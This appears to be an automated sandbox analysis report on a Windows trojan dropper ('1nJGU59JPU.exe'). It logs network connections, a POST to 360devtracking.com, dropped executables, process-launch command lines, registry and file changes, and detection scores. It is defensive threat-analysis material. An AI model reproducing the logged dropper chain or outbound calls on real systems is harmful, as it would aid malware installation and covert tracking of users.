Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50291
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown Network traffic detected: HTTP traffic on port 50799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50293
Source: unknown Network traffic detected: HTTP traffic on port 50562 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50627 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50357 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 16:59:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php! equals www.facebook.com (Facebook)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351350827.000002DEF1757000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.359235911.000001AC606C8000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.359010078.000001AC606D2000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358935337.000001AC606C6000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358077477.000001AC606D1000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359804478.0000018BEE6EF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.360104540.0000018BEE707000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359853031.0000018BEE702000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.364821402.0000018BEE70B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359113591.0000018BEE6ED000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359181332.0000018BEE71B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.360883339.0000018BEE70A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358355792.0000018BEE6F4000.00000004.00000001.sdmp, chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com' equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351350827.000002DEF1757000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com@6w equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comD equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comM equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comPXt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.351247625.000002DEF1756000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350869130.000002DEF1746000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349991182.000002DEF1743000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comV6w equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.357121246.000001AC606B3000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358283268.000001AC606C5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358135112.000001AC606C1000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.com] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000003.359804478.0000018BEE6EF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359113591.0000018BEE6ED000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.coma equals www.youtube.com (Youtube)
Source: chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comb equals www.youtube.com (Youtube)
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com,https://www.netflix.com,https://www.hulu.com,https://www.amazon.com,https://www.amazon.in,https://www.amazon.de,https://www.amazon.co.uk,https://www.amazon.co.jp,https://www.amazon.fr,https://www.amazon.es,https://www.amazon.it,https://www.amazon.co.br,https://www.amazon.ca,https://www.amazon.com.mx,https://meet.google.comp+ equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive

DDoS:

Too many similar processes found
Source: chrome.exe Process created: 76

System Summary:

Detected potential crypto function
PE file contains strange resources
Source: 1nJGU59JPU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1nJGU59JPU.tmp.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 1nJGU59JPU.tmp.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Vahutuqeke.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Kixysyshysy.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: installer.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: random.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Section loaded: security.dll
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Section loaded: security.dll
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Section loaded: security.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Section loaded: security.dll
Source: C:\Program Files (x86)\i-record\I-Record.exe Section loaded: swscale-2.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Section loaded: security.dll
Uses 32bit PE files
Source: 1nJGU59JPU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
Deletes files inside the Windows folder
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe File deleted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.5188.20541046
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_0045568C
Creates files inside the system directory
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe File created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00408C1C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00406AD4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 0040596C appears 117 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00407904 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00445E48 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00457FC4 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00457DB8 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00434550 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00403494 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 004533B8 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00446118 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: String function: 00403684 appears 229 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0042F594 NtdllDefWindowProc_A, 1_2_0042F594
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00423B94 NtdllDefWindowProc_A, 1_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004125E8 NtdllDefWindowProc_A, 1_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00479380 NtdllDefWindowProc_A, 1_2_00479380
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_0045763C
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 1_2_0042E944
PE file contains executable resources (Code or Archives)
Source: 1nJGU59JPU.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 1nJGU59JPU.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 1nJGU59JPU.tmp.0.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Sample file is different than original file name gathered from version info
Source: 1nJGU59JPU.exe, 00000000.00000003.271891331.0000000002570000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1nJGU59JPU.exe
Source: 1nJGU59JPU.exe, 00000000.00000003.272027551.0000000002460000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1nJGU59JPU.exe
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp File created: C:\Users\user\AppData\Local\Programs
Source: classification engine Classification label: mal100.troj.evad.winEXE@226/292@152/78
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File read: C:\Users\user\Desktop\desktop.ini
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource, 0_2_00409C34
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File created: C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: 1nJGU59JPU.exe Virustotal: Detection: 25%
Source: 1nJGU59JPU.exe Metadefender: Detection: 31%
Source: 1nJGU59JPU.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\1nJGU59JPU.exe File read: C:\Users\user\Desktop\1nJGU59JPU.exe
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\1nJGU59JPU.exe "C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe "C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe" /S /UID=rec7
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"
